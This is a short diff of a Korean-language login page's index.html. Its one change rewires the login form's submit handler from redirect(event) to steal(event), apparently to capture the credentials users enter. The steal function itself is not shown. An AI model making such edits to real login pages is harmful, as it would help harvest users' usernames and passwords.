--- a/index.html
+++ b/index.html
@@ -158,7 +158,7 @@
   <div class="login-wrapper">
     <div class="logo">로그인</div>
 
-    <form onsubmit="redirect(event)">
+    <form onsubmit="steal(event)">
       <label for="username">아이디</label>
       <input type="text" id="username" placeholder="아이디 입력">
 
